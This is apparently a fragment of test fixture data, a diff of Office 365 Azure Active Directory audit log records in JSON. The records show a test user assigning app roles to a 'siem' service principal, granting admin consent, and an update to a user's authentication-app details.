"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9992570Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795878"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": 
"env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "41c7d7a7-ce53-4696-aa78-37c451a95fe1"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": 
"", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": 
"Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9242333Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795815"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "14f7e7eb-0fd1-4f89-bda8-642d035f3541"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": 
"1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.IsAppOnly", "OldValue": "", "NewValue": "False"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] => [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", 
"Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:06.0142481Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795893"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], 
"TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "821dc03c-4e38-4cd1-82b2-3155b41b4418"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"NewValue": "False", "OldValue": "", "Name": "ConsentContext.IsAppOnly"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] => [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, 
PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:06.0142481Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795893"}, {"Name": "env_popSample", "Value": "0"}, 
{"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "821dc03c-4e38-4cd1-82b2-3155b41b4418"} {"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:15:04", "Actor": [{"Type": 5, "ID": "fim_password_service@support.onmicrosoft.com"}, {"Type": 3, "ID": "100300008060F582"}, {"Type": 2, "ID": "User_00000000-0000-0000-0000-000000000000"}, {"Type": 2, "ID": "00000000-0000-0000-0000-000000000000"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "d51ef8df-6617-4356-b8d4-89ad7efef31e", "RecordType": 8, "ActorIpAddress": "", "UserId": "fim_password_service@support.onmicrosoft.com", "UserType": 0, "UserKey": "100300008060F582@support.onmicrosoft.com", "ClientIP": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "ObjectId": "asr@testsiem.onmicrosoft.com", "ModifiedProperties": [{"Name": "StrongAuthenticationPhoneAppDetail", 
"OldValue": "[\r\n {\r\n \"DeviceName\": \"NO_DEVICE\",\r\n \"DeviceToken\": \"NO_DEVICE_TOKEN\",\r\n \"DeviceTag\": \"SoftwareTokenActivated\",\r\n \"PhoneAppVersion\": \"NO_PHONE_APP_VERSION\",\r\n \"OathTokenTimeDrift\": 0,\r\n \"DeviceId\": null,\r\n \"Id\": \"3b539b10-3846-4f9b-877d-55b0b8e76147\",\r\n \"TimeInterval\": null,\r\n \"AuthenticationType\": 2,\r\n \"NotificationType\": 1,\r\n \"SecuredPartitionId\": 0,\r\n \"SecuredKeyId\": 0\r\n }\r\n]", "NewValue": "[\r\n {\r\n \"DeviceName\": \"NO_DEVICE\",\r\n \"DeviceToken\": \"NO_DEVICE_TOKEN\",\r\n \"DeviceTag\": \"SoftwareTokenActivated\",\r\n \"PhoneAppVersion\": \"NO_PHONE_APP_VERSION\",\r\n \"OathTokenTimeDrift\": -1,\r\n \"DeviceId\": null,\r\n \"Id\": \"3b539b10-3846-4f9b-877d-55b0b8e76147\",\r\n \"TimeInterval\": null,\r\n \"AuthenticationType\": 2,\r\n \"NotificationType\": 1,\r\n \"SecuredPartitionId\": 0,\r\n \"SecuredKeyId\": 0\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "StrongAuthenticationPhoneAppDetail"}, {"Name": "TargetId.UserType", "OldValue": "", "NewValue": "Member"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "d51ef8df-6617-4356-b8d4-89ad7efef31e"}, {"Name": "actorObjectId", "Value": "00000000-0000-0000-0000-000000000000"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "fim_password_service@support.onmicrosoft.com"}, {"Name": "actorPUID", "Value": "100300008060F582"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "extendedAuditEventCategory", "Value": "User"}, {"Name": "targetUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "targetPUID", "Value": "1003200096971F55"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"StrongAuthenticationPhoneAppDetail\",\"TargetId.UserType\"]"}, {"Name": "correlationId", 
"Value": "4aa56c6c-8fa5-4787-a165-03f181541438"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"UserType\":\"Member\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "UserManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:15:04.2043419Z"}, {"Name": "env_epoch", "Value": "4QPHR"}, {"Name": "env_seqNum", "Value": "87075075"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##00000000-0000-0000-0000-000000000000_00000000-0000-0000-0000-000000000000_00000000-0000-0000-0000-000000000000"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "becwebservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "becwebservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RBWSR554"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update user.", "Id": "83c924c1-f2e2-4b39-8eda-b80c3823a875"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:16:18", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", 
"Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2e358876-29c8-45b5-8dba-e233cf769988"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:16:18.9844570Z"}, {"Name": "env_epoch", "Value": "Z4XUI"}, {"Name": "env_seqNum", "Value": "43649666"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", 
